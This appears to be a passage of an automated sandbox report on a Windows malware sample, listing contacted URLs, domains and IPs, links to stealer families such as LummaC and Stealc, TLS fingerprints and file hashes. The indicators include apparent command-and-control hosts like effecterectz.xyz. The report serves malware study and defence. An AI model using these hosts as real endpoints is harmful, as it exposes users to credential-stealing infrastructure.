                                                                                                                                                                                            https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://store.steampowered.com/legal/91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://recaptcha.net91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://upx.sf.netAmcache.hve.7.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://effecterectz.xyz/91B1.tmp.exe, 00000003.00000003.1471571879.0000000000949000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://effecterectz.xyz/P91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://store.steampowered.com/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://steamcommunity.com91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://127.0.0.1:2706091B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://effecterectz.xyz/api91B1.tmp.exe, 00000003.00000003.1471879039.000000000096A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high

                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      45.77.249.79
                                                                                                                                                                                                                      		immureprech.bizUnited States
                                                                                                                                                                                                                      		20473AS-CHOOPAUSfalse
                                                                                                                                                                                                                      104.21.56.70
                                                                                                                                                                                                                      		post-to-me.comUnited States
                                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      104.131.68.180
                                                                                                                                                                                                                      		deafeninggeh.bizUnited States
                                                                                                                                                                                                                      		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                      176.113.115.19
                                                                                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                                                                                      		49505SELECTELRUfalse
                                                                                                                                                                                                                      104.121.10.34
                                                                                                                                                                                                                      		steamcommunity.comUnited States
                                                                                                                                                                                                                      		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                      Analysis ID:1576575
                                                                                                                                                                                                                      Start date and time:2024-12-17 09:41:44 +01:00
                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 8m 29s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                      Number of analysed new started processes analysed:12
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                      Sample name:hpEAJnNwCB.exe
                                                                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                                                                      Original Sample Name:07a0b87962fbee50d2adc913f06a3e3b.exe
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal100.troj.evad.winEXE@4/7@13/5
                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                      • Successful, ratio: 94%
                                                                                                                                                                                                                      • Number of executed functions: 42
                                                                                                                                                                                                                      • Number of non-executed functions: 336
                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.89.179.12, 13.107.246.63, 172.202.163.200, 40.126.53.14
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                      03:42:41API Interceptor8929906x Sleep call for process: hpEAJnNwCB.exe modified
                                                                                                                                                                                                                      03:42:47API Interceptor5x Sleep call for process: 91B1.tmp.exe modified
                                                                                                                                                                                                                      03:43:23API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      45.77.249.79UoktqWamLR.exeGet hashmaliciousAZORultBrowse
                                                                                                                                                                                                                      • ehzwq.shop/erd/mac/index.php
                                                                                                                                                                                                                      RgZaLjgCto.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                                      • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                                                                                                                                                                                                                      java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                                      • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                                                                                                                                                                                                                      104.21.56.70DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                    ief722WreR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                      7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                        YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                          104.131.68.180java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                                                          • uyhgqunqkxnx.pw/EiDQjNbWEQ/

                                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          deafeninggeh.bizDG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 178.62.201.34
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                          • 178.62.201.34
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                          • 104.21.16.1
                                                                                                                                                                                                                                          immureprech.bizDG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 178.62.201.34
                                                                                                                                                                                                                                          SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 178.62.201.34
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                          • 178.62.201.34
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                          • 172.67.207.38
                                                                                                                                                                                                                                          steamcommunity.comDG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                          • 23.37.186.133
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          post-to-me.comDG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.179.207
                                                                                                                                                                                                                                          AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 172.67.179.207
                                                                                                                                                                                                                                          XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                          • 172.67.179.207

                                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          AS-CHOOPAUSDG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          Setup.exe (1).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 209.222.21.115
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 149.248.45.75
                                                                                                                                                                                                                                          bot.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                          • 45.32.181.8
                                                                                                                                                                                                                                          rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                          • 108.61.131.209
                                                                                                                                                                                                                                          Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 45.63.66.114
                                                                                                                                                                                                                                          DIGITALOCEAN-ASNUSpayload_1.htaGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                          • 174.138.125.138
                                                                                                                                                                                                                                          1.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 157.245.2.219
                                                                                                                                                                                                                                          DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 178.62.201.34
                                                                                                                                                                                                                                          fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                                                                          • 174.138.125.138
                                                                                                                                                                                                                                          SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 178.62.201.34
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                          • 178.62.201.34
                                                                                                                                                                                                                                          Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                          • 138.68.79.95
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                          • 178.62.201.34
                                                                                                                                                                                                                                          CLOUDFLARENETUSLs4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                                                                                          • 104.26.0.100
                                                                                                                                                                                                                                          X2hna87N3Y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.50.161
                                                                                                                                                                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                          • 104.21.67.152
                                                                                                                                                                                                                                          https://forms.gle/WXkgv9t1iFkxFXZb7Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                                                          RkB7FehGh6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.2.110
                                                                                                                                                                                                                                          MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                          • 172.67.177.134
                                                                                                                                                                                                                                          https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 172.67.181.93
                                                                                                                                                                                                                                          c5bnEkMx.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                                          Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.21.83.229
                                                                                                                                                                                                                                          sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                          • 188.114.97.6
                                                                                                                                                                                                                                          SELECTELRUDG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 176.113.115.19
                                                                                                                                                                                                                                          he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 176.113.115.19
                                                                                                                                                                                                                                          wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 176.113.115.19
                                                                                                                                                                                                                                          AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 176.113.115.19
                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                          • 176.113.115.178
                                                                                                                                                                                                                                          rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 176.113.115.19
                                                                                                                                                                                                                                          TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 176.113.115.19
                                                                                                                                                                                                                                          XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 176.113.115.19
                                                                                                                                                                                                                                          QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 176.113.115.19
                                                                                                                                                                                                                                          LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                          • 176.113.115.19

                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1X2hna87N3Y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          RkB7FehGh6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          c5bnEkMx.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                          • 104.131.68.180
                                                                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                                                                          • 45.77.249.79
                                                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          bxAoaISZJQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 104.21.56.70

                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_91B1.tmp.exe_8537807789875a79b84ac93643ef2b109937bafd_abd72e8b_983e4d82-f09f-4ef8-a85f-abf4b4cadb06\Report.wer

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                          Entropy (8bit):0.957081685306807
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:WZi1vUpEJsZh4Bb74sfNUQXIDcQUGc6UgscEMcw3B+HbHg/8BRTf3Oy1E45WAU69:fUpEJzOWb0DGGyju3RzuiF4Z24IO8c
                                                                                                                                                                                                                                          MD5:48DB73B459F846EDCF960DB7596420EF
                                                                                                                                                                                                                                          SHA1:F6DDD2BD9EF74459EC516650116F3D7B18DD7A9E
                                                                                                                                                                                                                                          SHA-256:2624451391F13D38502E4ED9F30457AB70F970BA75755AA04A9E909FE96BAA04
                                                                                                                                                                                                                                          SHA-512:CFC676120C42920F06A460ECB214C6EB9FCBE21746CBD170947EDC6ABADA141D99AE41A4F8BD1B90D18B79839AC1E4229A1E5FBB63C5869C00F6036A4A829625
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Reputation:low
